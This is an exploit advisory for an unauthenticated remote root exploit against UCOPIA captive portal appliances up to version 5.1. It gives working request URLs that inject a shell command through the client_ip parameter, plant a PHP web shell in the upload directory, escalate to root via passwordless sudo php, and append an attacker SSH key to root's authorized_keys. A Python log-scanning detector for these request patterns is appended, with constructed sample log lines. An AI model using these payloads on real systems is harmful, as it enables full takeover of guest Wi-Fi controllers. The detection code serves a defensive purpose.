UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution 2017-10-02 19:05:03

# Exploit Title: Unauthenticated remote root code execution on captive portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to Ucopia wifi guest, every request is redirected to controller.access.network

# First, create an easier-to-use PHP backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=;echo '<?php system($_GET[0]); ?>'>/var/www/html/upload/bd.php;echo t

# As php is in sudoers without a password...
https://controller.access.network/upload/bd.php?0=sudo /usr/bin/php -r 'system("id");'

# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo /usr/bin/php -r 'system("echo ssh-rsa AAAA[...] >> /root/.ssh/authorized_keys");'
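
# Added detection example (not part of the original advisory): a Python check over web access logs for the two request patterns shown above, a client_ip value on autoconnect_redirector.php that is not an IP address, and a .php script requested from /upload/. The log format and the sample lines are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample lines in Apache combined-log style (not from a real appliance).
SAMPLE_LOG = """\
10.0.0.23 - - [02/Oct/2017:19:01:11 +0200] "GET /autoconnect_redirector.php?client_ip=10.0.0.23 HTTP/1.1" 302 0
10.0.0.42 - - [02/Oct/2017:19:02:40 +0200] "GET /autoconnect_redirector.php?client_ip=;echo%20t HTTP/1.1" 200 12
10.0.0.42 - - [02/Oct/2017:19:03:02 +0200] "GET /upload/bd.php?0=id HTTP/1.1" 200 54
10.0.0.23 - - [02/Oct/2017:19:04:00 +0200] "GET /upload/logo.png HTTP/1.1" 200 2048
"""

# Source address and request target from one access-log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_ip(value):
    """True only when the whole value parses as an IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def classify(line):
    """Return (source_ip, reason) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    src, target = m.groups()
    url = urlsplit(target)
    if url.path.endswith("/autoconnect_redirector.php"):
        # Split on '&' only, so a ';' stays inside the decoded value.
        for pair in url.query.split("&"):
            name, _, value = pair.partition("=")
            if unquote_plus(name) == "client_ip" and not is_ip(unquote_plus(value)):
                return (src, "client_ip is not an IP address")
    if url.path.startswith("/upload/") and url.path.lower().endswith(".php"):
        return (src, "PHP script requested from upload directory")
    return None

def scan(log_text):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for src, reason in scan(SAMPLE_LOG):
        print(src, reason)
```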